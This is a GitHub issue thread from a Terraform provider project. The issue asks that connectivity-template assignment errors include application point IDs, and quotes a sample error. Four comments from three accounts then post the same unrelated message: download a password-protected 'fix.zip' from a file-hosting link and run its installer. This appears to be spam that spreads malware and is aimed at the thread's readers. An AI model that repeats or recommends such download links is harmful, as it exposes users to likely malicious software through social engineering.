### ISSUE TITLE
Enhance CT application error to include application point ID(s) in `summary` text

### ISSUE THREAD

**Issue by chrismarget-j** [Juniper/terraform-provider-apstra#815]
#802 includes errors which look like this:

```
╷
│ Error: failed while assigning Connectivity Template "11948f39-638e-11ef-81f0-617073747261" to Application Points
│ 
│   with apstra_datacenter_connectivity_template_assignments.DC1_VNET_VDI_SERVER_GROUP_1,
│   on 03_ct_internal_generic_systems_assignment.tf line 6, in resource "apstra_datacenter_connectivity_template_assignments" "DC1_VNET_VDI_SERVER_GROUP_1":
│    6: resource "apstra_datacenter_connectivity_template_assignments" "DC1_VNET_VDI_SERVER_GROUP_1" {
│ 
│ {"api_response":null,"config_blueprint_version":0,"errors":{"application_points":{"1":{"policies":{"0":"Not a valid application point"}}}},"error_code":422} - http response '' at
│ 'http://apstra-lab/api/blueprints/558b40a1-59ef-4a30-ad4e-9d6c054577ae/obj-policy-batch-apply?async=full&async=full'
╵
```

The error summary includes the CT ID, but not the application point IDs.

The API error also doesn't include the application point IDs.

We should include the application point IDs in the error summary.

This applies equally to all CT assignment resources:
- `apstra_datacenter_connectivity_template_assignment`
- `apstra_datacenter_connectivity_template_assignments`
- `apstra_datacenter_connectivity_templates_assignment`

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
